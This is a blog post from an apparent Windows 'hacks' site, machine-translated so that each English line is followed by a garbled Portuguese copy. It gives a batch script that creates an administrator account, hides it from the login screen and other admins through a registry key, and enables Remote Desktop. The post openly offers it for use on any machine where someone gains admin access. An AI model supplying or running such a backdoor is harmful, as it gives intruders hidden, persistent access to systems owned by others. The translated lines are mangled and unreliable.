Your best source of information and news about windows , drivers and secrets on the internet Sua melhor fonte de informações e notícias sobre janelas, motoristas e segredos na internet

Vista ARTICLES Vista ARTIGOS TOP 50 TOP 50 Spyware Virus Vírus Spyware Vista SOFT Vista SOFT Vista HELP Vista HELP

How to make a Hidden Admin Account using bat Script ! Como fazer uma Oculto Conta admin usando Script morcego!


Hey guys i have been playing around with bat scripts and i found this small code that will let you create a admin account and hide it from the super admin. Ei caras i foram brincar com morcego scripts e encontrei esta pequena código que permitirá que você crie uma conta admin e escondê-lo a partir do super admin. so in case you get a chance to access a box with admin status all you have to do is to copy this code to note pad and make the changes and save it as .bat and run it. assim no caso de você ter uma oportunidade de aceder a uma caixa com todos os admin status você tem que fazer é copiar esse código para bloco de notas e faça as alterações e salvá-lo como. bastão e executá-lo. and then you have your own admin account which is hidden :) {Original Code by Netanelj Credits goes to AgentSmith15 for the Dynamic codes} e então você terá seu próprio administrador conta que está escondido:) (Original pelo Código Netanelj Créditos vai para AgentSmith15 para a códigos Dinâmicas)

@Echo Off @ Echo Off

SET /P usr=[Enter new username here:] SET / usr = P [novo nome de usuário Digite aqui:]

SET /P pwd=[Enter new password here:] SET / P pwd = [Digite a nova senha aqui:]

:: SET /P takes the user input and puts it into the variable. :: SET / P leva o usuário input e coloca-o na variável.

echo — Creating New User, “%usr%” with password “%pwd%” – echo - Criar Novo Usuário, "% usr%", com senha "pwd%%" --

net user “%usr%” “%pwd%” /add net usuário "% usr%" "% pwd%" / add

echo — Adding User to Group Administrator – echo - Adicionar usuário ao grupo Administrador --

net localgroup Administrators %usr% /add net localgroup Administradores%% usr / adicionar

echo — User Is Now Administrator — >> echo - O usuário é agora Administrador ->>

echo — Hidding User – echo - escondido Usuário --

REG ADD HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList /v %usr% /t REG_DWORD /d 0 /f REG ADD HKLM \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon \ SpecialAccounts \ UserList / usr%% v / t REG_DWORD / d 0 / f

echo — Activating Terminal Service – echo - Activar Terminal Service --

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 0 REG ADD HKLM \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server / v fDenyTSConnections / t REG_DWORD / d 0

echo — Activating Terminal Service Done – echo - Activar Feito Terminal Service --

SET /P =Press Enter to continue . SET / P = Pressione a tecla Enter para continuar. . .

Exit Sair

Copy this to notepad. Copiar para este bloco. save it as install.bat run it. guardá-lo como install.bat executá-lo.
Enter your desired username & password. Digite seu nome de usuário e senha desejada. done feito :)

Popularity: 1% Popularity: 1%


Written by magakos. Escrito por magakos. Read more great feeds at is source Leia mais em grande feeds é fonte WEBSITE WEBSITE
no comments sem comentários . .
Read more articles on Leia mais artigos sobre Scripts Scripts and e WindowS HackS Windows Hacks and e All Todos and e otherSoftware otherSoftware . .

Related articles Artigos relacionados

No comments Sem comentários

There are still no comments on this article. Ainda não há comentários sobre este artigo.

Leave your comment... Deixe o seu comentário ...

If you want to leave your comment on this article, simply fill out the next form: Se quiser deixar o seu comentário sobre este artigo, simplesmente preencha o seguinte formulário:




You can use these XHTML tags: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <code> <em> <i> <strike> <strong> . Você pode usar estes XHTML tags: <a href="" title="Avião"> <abbr title="Avião"> <acronym title="Avião"> <b> <blockquote cite=""> <code> <em> <i > <strike> <strong>.